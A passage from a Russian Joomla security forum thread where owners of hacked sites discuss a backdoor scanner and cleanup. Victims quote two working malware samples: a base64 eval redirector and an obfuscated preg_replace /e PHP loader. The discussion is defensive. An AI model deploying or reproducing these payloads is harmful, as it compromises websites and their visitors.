Сканируем сайты! Сканер сайта или Shell and Backdoor Script Finder - страница 6 - Безопасность сайтов на Joomla

При открытии сайт/fls.php
выходит ошибка
Fatal error: Call to undefined function hash_file() in ***/docs/fls.php(11) : eval()'d code on line 40

Это нормально?

Включите функцию Hash на хостинге в настройках PHP, после этого будет сканировать.

Добрый день.
ровно под новый год все сайты на хостинге облагородились новой строчкой:
После чего придя на работу после новогодних, обнаружилось что сайты не работают, лежат мертво, со словами:
"Ошибка HTTP 500 (Internal Server Error): При попытке сервера выполнить запрос возникла неожиданная ситуация."
На вопрос хостеру что происходит, был получен ответ:
"Насколько мы видим, возникает ошибка в скриптах сайта. "
Удаление внедренного кода во всех обнаруженных местах к восстановлению работоспособности не привело. Сайты продолжают лежать.
При чем рухнули сайты на Joomla 1.5.
Что делать?
Бэкапов нет, за новогодние праздники прошел 7-ми дневный срок хранения. Связи с разработчиком тоже нет.

Добрый день.
ровно под новый год все сайты на хостинге облагородились новой строчкой:

Код

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zaXRlLnBvcnRyZWxheS5jb20vIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));

После чего придя на работу после новогодних, обнаружилось что сайты не работают, лежат мертво, со словами:
"Ошибка HTTP 500 (Internal Server Error): При попытке сервера выполнить запрос возникла неожиданная ситуация."
На вопрос хостеру что происходит, был получен ответ:
"Насколько мы видим, возникает ошибка в скриптах сайта. "
Удаление внедренного кода во всех обнаруженных местах к восстановлению работоспособности не привело. Сайты продолжают лежать.
При чем рухнули сайты на Joomla 1.5.
Что делать?
Бэкапов нет, за новогодние праздники прошел 7-ми дневный срок хранения. Связи с разработчиком тоже нет.

Слить сайт на локалку и почистить все файлы от ненужного кода, потом сменить пароли ftp и залить сайт по новой

Удаление кода не привело к восстановлению работоспособности сайтов. Они как не загружались, так и не грузятся. хотя код локально почищен и выложен обратно.

повредили при чистки файлы
замените файлы CMS то такой же версии как ваша

 писали, что скрипт стал платный (как бы full версия) - где посмотреть, почитать, приобрести? Честно, после всех ковыряний башка не работает - проблема такая же как и выше - новый год, сайты лежат, но лечатся! И так хочется воспользоваться советом - идти поспать, что наверное что то пропустил - отсюда и вопрос.
p.s.
А что может увеличить размер сайта (метров на 16-20). Картинки вроде те же, все подчистил. Куда рыть?

повредили при чистки файлы
замените файлы CMS то такой же версии как ваша

Как по скриптам определить точную версию?

Некоторые файлы имеют дубль своего контента при чем не обязательно в точной последовательности. Как будто часть скрипта скопировано и вставлено добавкой.

Некоторые файлы имеют дубль своего контента при чем не обязательно в точной последовательности. Как будто часть скрипта скопировано и вставлено добавкой.

это не дубль))) это ноу хау
а в правом углу зашита дверь ползунок передвиньте до упора и посмотрите код

Как по скриптам определить точную версию?

версия смотрится в админке справа вверху или в файле версион

это не дубль))) это ноу хау
а в правом углу зашита дверь ползунок передвиньте до упора и посмотрите код

Не во всех файлах далеко справа находится вставка вирусного кода. хотя один такой файл есть. И, кстати, а что конкретно я должна там увидеть?

Реально после удаления вставки eval....); приходится еще по error_log искать в каком файле есть ошибка и исправлять ее вручную, иногда это дублированный частичный кусок этого же скрипта вставленный в, возможно случайное место, этого скрипта.
Были косяки в скриптах основного шаблона, чистыми файлами не заменить, т.к. ни где ту версию rt_kinetic_j15_v1.5.2 нигде не найти.
Нашелся косяк с дублированием кода в компоненте RFform.
и несмотря на то что сайт большей своей частью стал уже отображаться, где то еще косяки.
Вот как с этим бороться?
У меня еще 4 сайта так лежат.

Всем привет! После того как сайт перестал открываться и выдавал синтаксические ошибки, мне удалось по одному из пути обнаружить  backdoor . Благо бекап был. Скачал скрипт ТС и вот что вижу

Это мне теперь нужно по всем путям удалить название сайта ? Или как ?

На одном из сайтов в папке images/stories найдены 6 php файлов.
.cache_mp1p8n.php
index.php
indexDvf.php
listywa.php
story.php
Trinfo.php
Ну и в самой папке images тоже один Index.php
Что это? Достаточно ли будет простого удаления что бы больше не появилось?

У посетителя сайта ругнулся антивирус AVG. На сайте в <body> встраивался iframe. Покопался в файлах и обнаружил:


нашел в \tmp\j.php
с содержанием

и лишний файл \components\com_content\.yzislk.php

Сканер больше подозрительного не показал. Смотрел остальные файлы по дате модификации - вроде норм. Что еще глянуть?

Всем привет! После того как сайт перестал открываться и выдавал синтаксические ошибки, мне удалось по одному из пути обнаружить  backdoor . Благо бекап был. Скачал скрипт ТС и вот что вижу

Спойлер

[свернуть]

Это мне теперь нужно по всем путям удалить название сайта ? Или как ?

у меня такой же результат сканирования...
просветите ПОЖАЛУЙСТА что с этим делать?

у меня такой же результат сканирования...
просветите ПОЖАЛУЙСТА что с этим делать?

открыть и посмотреть содержание указанных файлов, если не сильны в PHP, то сравнить с оригиналами

открыть и посмотреть содержание указанных файлов, если не сильны в PHP, то сравнить с оригиналами

те это значит что они однозначно заражены? или не факт?

те это значит что они однозначно заражены? или не факт?

или не факт

Братцы подскажите это случайно не shell ?
data_info/cms_importer.php с содержанием:

и data_info/joomla.php

И еще нашел около двухсот файлов с содержанием

А также есть несколько файлов не имеющих отношения к сайту я так думаю
\administrator\components\com_akeeba\akeeba\platform\101f0.php
\components\com_content\.mooasf.php
\components\com_content\views\categories\tmpl\f411507.php
\components\com_jce\editor\libraries\css\4aa9.php
с содержанием:

Кто знает, если сайты находятся на виртуальном хостинге они могут заразится от соседей(других людей со своими сайтами)?
Если заказать VPS это надежнее или...?

Если заказать VPS это надежнее или...?

Не поможет. Сам имею выделенный сервер. Заражения все равно присутствуют!

Кто знает, если сайты находятся на виртуальном хостинге они могут заразится от соседей(других людей со своими сайтами)?

только от вашей учетной записи, ну и как хостер настроит

Если заказать VPS это надежнее или...?

надежнее, но потребуется настройка и разграничение

Ни один хостер не даст доступ по ssh если у Вас не VPS.

не правда. Мне хостер дал, хотя у меня не VPS

ребят, сегодня загнулся сайт http://portall.com.ua/
Слил на локалку, установил скрипт - он ничего не показал (как я понял, зараженные файлы должны были отметиться красным, или я Неправильно понял?) Словом, может кто советом поможет как найти и обезвредить заразу?

Просьба к тем кто находит у себя при чистки заразу

Подскажите, что означает String:: $_POST[  или  String:: phpinfo()  или  String:: confirm( ?

Эти строки что-то значат? Ибо я не владею PHP

Заранее благодарен

nick71
Ответ дал тут

http://joomlaforum.ru/index.php/topic,253917.msg1277876.html#msg1277876

nick71
Ответ дал тут

Извините что тут пишу!!
Вы мне ЛС написали, но ответить не могу, пока ЛС недоступны. По вашему вопросу тут я писала http://joomlaforum.ru/index.php/topic,253873.0.html

День добрый! Сканер ругается на этот файл, а я не понимаю, что с ним не так. Подскажите, кому не лень... Спасибо...

Люди, у меня во всех PHP файлах вот такая вот бодяга, как быть? К тому же когда пытаюсь добавить материал, кнопки никак не реагируют в админке. За ранее всех благодарю!

Сканер сайита или Shell and Backdoor Script Finder

качаем

 

Что с сайтом? Вторые сутки не могу на него попасть

сейчас работает

Люди, у меня во всех PHP файлах вот такая вот бодяга, как быть? К тому же когда пытаюсь добавить материал, кнопки никак не реагируют в админке. За ранее всех благодарю!

Код

<?php /*versio:2.12*/$Il1I=0;$GLOBALS['Il1I'] = 'Y.Y3VybAUiX2luaXQQ!!Q~aYWxsb3dfdXJsX2ZvcGVuMQxqX3NldG9wdA%X2V4ZWMXw;TY2xvc2UcB PGltZyBzcmM9IgIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4$SFRUUF9IT1NUMTI3LgReMTAuJNMTkyLjE2OC4hvlAdwPl^a29ubW8ubmV0hmZ2Fib3Iuc2Uec2lsYmVyLmRlZ#aGF2ZWFwb2tlLmNvbS5hdQ&VWV8Ogb.fZGlzcGxheV9lcnJvcnM x_ZGV0ZXJtaW5hdG9yNmYW5kMi4xMgmRmVoWXg0dzR3ZjB3M2QxPYmFzZTY0X2RlY29kZQrYmFzZTY0X2VuY29kZQHgjaHR0cDovLwLej $NSFRUUF9VU0VSX0FHRU5UdW5pb24otaMUc2VsZWN0nD&TUkVRVUVTVF9VUkkU0NSSVBUX05BTUUUVVFUllfU1RSSU5HPw)@L3RtcC8zXL3RtcAo=TVE1Q{RrVEVNUARVE1QRElSD~{OdXBsb2FkX3RtcF9kaXI(wLgkdmVyc2lvzLQ(DULXBocApSFRUUF9FWEVDUEhQL}EWb3V0_b2s}IfwaHR0cAFOi8v%aZP#L3BnLnBocD91PQUg~Jms9l)JnQ9cGhwJnA9$YJnY9AnNZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkVreFNVbHNTU2w3SUNSUlVUQlBVVThnUFNCUlVWRXdVVkV3TUNneUxDQTJLVHNnSkZFd1QwOVBUeUE5SUNSUlVUQlBVVTh1VVZGUk1GRlJNREFvTVRBc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1VWRlJNRkZSTURBb01qTXNJREl3S1NrZ1BUMGdVVkZSTUZGUk1EQW9ORE1zSURJcEtTQjdJQ1JKYkVsc2JFazlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JKTVVsSmJFa3BPeUJ5WlhSMWNtNGdVVkZSTUZGUk1EQW9ORFVzSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUlJNRTlQVDA4cEtYc2dKRWt4TVRGSmJDQTlJRUFrVVRCUFQwOVBLQ2s3SUNSUk1FOVBVVkVnUFNBa1VWRXdUMUZQTGxGUlVUQlJVVEF3S0RRM0xDQXhNQ2s3SUNSSk1XeEpiR3dnUFNBa1VWRXdUMUZQTGxGUlVUQlJVVEF3S0RVNExDQTNLVHNnSkZGUlQwOVJVU0E5SUNSUlVUQlBVVTh1VVZGUk1GRlJNREFvTmpVc0lESXBMbEZSVVRCUlVUQXdLRFk1TENBM0tUc2dRQ1JSTUU5UFVWRW9KRWt4TVRGSmJDd2dRMVZTVEU5UVZGOVZVa3dzSUNSSk1VbEpiRWtwT3lCQUpGRXdUMDlSVVNna1NURXhNVWxzTENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUFQxRlJLQ1JKTVRFeFNXd3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlBUMUZSS0NSSk1URXhTV3dzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTVEZzYkRGc0lEMGdRQ1JKTVd4SmJHd29KRWt4TVRGSmJDa3BJSHR5WlhSMWNtNGdVVkZSTUZGUk1EQW9ORFVzSURBcE8zMGdRQ1JSVVU5UFVWRW9KRWt4TVRGSmJDazdJSEpsZEhWeWJpQlJVVkV3VVZFd01DZzBOU3dnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCUlVWRXdVVkV3TUNnM09Td2dNVFFwTGlSSk1VbEpiRWt1VVZGUk1GRlJNREFvT1RNc0lETTVLVHNnZlNCOUlHWjFibU4wYVc5dUlIVndaQ2drVVU5UFVVOHdMQ1JKTVVsSmJFa3BleUFrVVRCUk1EQlJJRDBnUUdkbGRHaHZjM1JpZVc1aGJXVW9RQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLREV6TXl3Z01USXBYU2s3SUdsbUlDZ2tVVEJSTURCUklDRTlQU0JSVVZFd1VWRXdNQ2cwTlN3Z01Da2dZVzVrSUhOMGNuQnZjeWdrVVRCUk1EQlJMQ0JSVVZFd1VWRXdNQ2d4TkRVc0lEWXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JSTUZFd01GRXNJRkZSVVRCUlVUQXdLREUxTXl3Z05Da3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkV3VVRBd1VTd2dVVkZSTUZGUk1EQW9NVFU1TENBeE1Ta3BJQ0U5UFNBd0tYc2dKRkZSTUZGUlVUMUFabTl3Wlc0b0pGRlBUMUZQTUN4UlVWRXdVVkV3TUNneE56UXNJRElwS1RzZ1FHWmpiRzl6WlNna1VWRXdVVkZSS1RzZ2FXWWdLRUJwYzE5bWFXeGxLQ1JSVDA5UlR6QXBLWHNnZDNKcGRHVW9KRkZQVDFGUE1Dd2daMlYwWm1sc1pTZ2tTVEZKU1d4SktTazdJSDA3SUgwZ2ZTQWtTV3d4Ykd4SklEMGdRWEp5WVhrb1VWRlJNRkZSTURBb01UYzVMQ0F4TWlrc0lGRlJVVEJSVVRBd0tERTVNeXdnTVRFcExDQlJVVkV3VVZFd01DZ3lNRFVzSURFeUtTd2dVVkZSTUZGUk1EQW9NakU1TENBeU1pa3BPeUFrU1RGSlNURnNJRDBnSkVsc01XeHNTVnN4WFRzZ1puVnVZM1JwYjI0Z2QzSnBkR1VvSkZGUFQxRlBNQ3drU1RGSlNURXhLWHNnYVdZZ0tDUlJNRkV3VVZFOVFHWnZjR1Z1S0NSUlQwOVJUekFzVVZGUk1GRlJNREFvTVRjMExDQXlLU2twZXlCQVpuZHlhWFJsS0NSUk1GRXdVVkVzSkVreFNVa3hNU2s3SUVCbVkyeHZjMlVvSkZFd1VUQlJVU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQnZkWFJ3ZFhRb0pFa3hNVEV4TVN3Z0pGRXdVVkZQTUNsN0lHVmphRzhnVVZGUk1GRlJNREFvTWpRekxDQXpLUzRrU1RFeE1URXhMbEZSVVRCUlVUQXdLREkwTml3Z01pa3VKRkV3VVZGUE1DNGlYSEpjYmlJN0lIMGdablZ1WTNScGIyNGdjR0Z5WVcwb0tYc2djbVYwZFhKdUlGRlJVVEJSVVRBd0tEUTFMQ0F3S1RzZ2ZTQkFhVzVwWDNObGRDaFJVVkV3VVZFd01DZ3lOVEVzSURFNUtTd2dNQ2s3SUdSbFptbHVaU2hSVVZFd1VWRXdNQ2d5TnpNc0lERTJLU3dnTVNrN0lDUlJNREF3VVZFOVVWRlJNRkZSTURBb01qa3hMQ0EwS1RzZ0pGRlBUekJQVVQxUlVWRXdVVkV3TUNneU9UVXNJRFlwT3lBa1VWRlBVVTh3UFZGUlVUQlJVVEF3S0RNd01pd2dNakFwT3lBa1NVa3hiRWxKUFZGUlVUQlJVVEF3S0RNeU15d2dNVGdwT3lBa1VWRlJVVEJSUFZGUlVUQlJVVEF3S0RNME1pd2dNVGdwT3lBa1NVbEpiR3hzUFZGUlVUQlJVVEF3S0RNMk15d2dNVEFwT3lBa1NVbEpiR3hzTGoxemRISjBiMnh2ZDJWeUtFQWtYMU5GVWxaRlVsdFJVVkV3VVZFd01DZ3hNek1zSURFeUtWMHBPeUFrU1d4c01Xd3hJRDBnUUNSZlUwVlNWa1ZTVzFGUlVUQlJVVEF3S0RNM09Td2dNakFwWFRzZ1ptOXlaV0ZqYUNBb0pGOUhSVlFnWVhNZ0pFa3hNVEV4TVQwK0pGRXdVVkZQTUNsN0lHbG1JQ2h6ZEhKd2IzTW9KRkV3VVZGUE1DeFJVVkV3VVZFd01DZ3pPVGtzSURjcEtTbDdKRjlIUlZSYkpFa3hNVEV4TVYwOVVWRlJNRkZSTURBb05EVXNJREFwTzMwZ1pXeHpaV2xtSUNoemRISndiM01vSkZFd1VWRlBNQ3hSVVZFd1VWRXdNQ2cwTVRFc0lEZ3BLU2w3SkY5SFJWUmJKRWt4TVRFeE1WMDlVVkZSTUZGUk1EQW9ORFVzSURBcE8zMGdmU0JwWmlnaGFYTnpaWFFvSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRJekxDQXhOU2xkS1NrZ2V5QWtYMU5GVWxaRlVsdFJVVkV3VVZFd01DZzBNak1zSURFMUtWMGdQU0JBSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRNNExDQXhOU2xkT3lCcFppaEFKRjlUUlZKV1JWSmJVVkZSTUZGUk1EQW9ORFV6TENBeE5pbGRLU0I3SUNSZlUwVlNWa1ZTVzFGUlVUQlJVVEF3S0RReU15d2dNVFVwWFNBdVBTQlJVVkV3VVZFd01DZzBOamtzSURJcElDNGdRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLRFExTXl3Z01UWXBYVHNnZlNCOUlHbG1JQ2drVVU4d1R6QlBQU1JKU1Vsc2JHd3VRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLRFF5TXl3Z01UVXBYU2w3SUNSSk1VbHNiRWs5UUcxa05TZ2tTVWxKYkd4c0xpUlJUMDh3VDFFdVVFaFFYMDlUTGlSUlVVOVJUekFwT3lBa1VWRlJVVEF3UFZGUlVUQlJVVEF3S0RRM015d2dOeWs3SUNSUlVVOVJUMUVnUFNCQmNuSmhlU2hSVVZFd1VWRXdNQ2cwT0RJc0lEWXBMQ0JBSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRreExDQTBLVjBzSUVBa1gxTkZVbFpGVWx0UlVWRXdVVkV3TUNnME9UZ3NJRFlwWFN3Z1FDUmZSVTVXVzFGUlVUQlJVVEF3S0RRNU1Td2dOQ2xkTENCQUpGOUZUbFpiVVZGUk1GRlJNREFvTlRBMUxDQTRLVjBzSUVBa1gwVk9WbHRSVVZFd1VWRXdNQ2cwT1Rnc0lEWXBYU3dnUUdsdWFWOW5aWFFvVVZGUk1GRlJNREFvTlRFM0xDQXhPU2twS1RzZ1ptOXlaV0ZqYUNBb0pGRlJUMUZQVVNCaGN5QWtTV3hKTVVreEtYc2dhV1lnS0NGbGJYQjBlU2drU1d4Sk1Va3hLU2w3SUNSSmJFa3hTVEV1UFVSSlVrVkRWRTlTV1Y5VFJWQkJVa0ZVVDFJN0lHbG1JQ2hBYVhOZmQzSnBkR0ZpYkdVb0pFbHNTVEZKTVNrcGV5QWtVVkZSVVRBd0lEMGdKRWxzU1RGSk1Uc2dZbkpsWVdzN0lIMGdmU0I5SUNSMGJYQTlKRkZSVVZFd01DNVJVVkV3VVZFd01DZzFNemdzSURJcExpUkpNVWxzYkVrN0lHbG1JQ2hBSkY5VFJWSldSVkpiSWtoVVZGQmZXVjlCVlZSSUlsMDlQU1JKTVVsc2JFa3BleUJsWTJodklDSmNjbHh1SWpzZ1FHOTFkSEIxZENoUlVWRXdVVkV3TUNnMU5ERXNJRGdwTENBa1VVOVBNRTlSTGxGUlVUQlJVVEF3S0RVMU1Dd2dNaWt1SkZFd01EQlJVUzVSVVZFd1VWRXdNQ2cxTlRVc0lEWXBLVHNnYVdZZ0tDUkpiR3hzYkRFOUpFbEpNV3hKU1NoQUpGOVRSVkpXUlZKYlVWRlJNRkZSTURBb05UWXlMQ0F4TmlsZEtTbDdJRUJsZG1Gc0tDUkpiR3hzYkRFcE95QmxZMmh2SUNKY2NseHVJanNnUUc5MWRIQjFkQ2hSVVZFd1VWRXdNQ2cxT0RJc0lEUXBMQ0JSVVZFd1VWRXdNQ2cxT0Rjc0lETXBLVHNnZlNCbGVHbDBLREFwT3lCOUlHbG1JQ2hBYVhOZlptbHNaU2drZEcxd0tTbDdJRUJwYm1Oc2RXUmxYMjl1WTJVb0pIUnRjQ2s3SUgwZ1pXeHpaWHNnSkZGUE1FOHdUejFBZFhKc1pXNWpiMlJsS0NSUlR6QlBNRThwT3lCMWNHUW9KSFJ0Y0N4UlVWRXdVVkV3TUNnMU9UUXNJRFlwTGxGUlVUQlJVVEF3S0RZd01Td2dOQ2t1SkVsc01XeHNTVnN3WFM1UlVWRXdVVkV3TUNnMk1UQXNJREUwS1M0a1VVOHdUekJQTGxGUlVUQlJVVEF3S0RZeU55d2dOQ2t1SkVreFNXeHNTUzVSVVZFd1VWRXdNQ2cyTXpNc0lERXlLUzRrVVRBd01GRlJMbEZSVVRCUlVUQXdLRFkwTnl3Z05Da3VKRkZQVHpCUFVTazdJSDBnZlNCOSIpKTswcHJlZ19yZXBsYWNlxul6261736536345f6465636f6465';if (!function_exists('QQQ0QQ00')){function QQQ0QQ00($a, $b){$c=$GLOBALS['Il1I']; $d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b));}};$Q0QOOOQ00 = QQQ0QQ00(6474, 16);$Q0QOOOQ00("/Il11lIIII/e", QQQ0QQ00(654, 5819), "Il11lIIII");?>

В общем я эту проблему решил программкой Text Replacer 2.17. Суть её работы заключается в том, что в ней есть 2 окошка, в первый мы вставляем то что ищем, а во второе - то на что хотим заменить. В моём случае я вставил весь код своего вируса в первое окошко "что ищем", а второе окошко "на что заменить" оставил пустым и нажал заменить. Через 15 минут все сайты на локальном диске были почищены, где мне оставалось лишь перезалить их на хост. Думаю этот же принцип можно применить и к многим другим вирусам.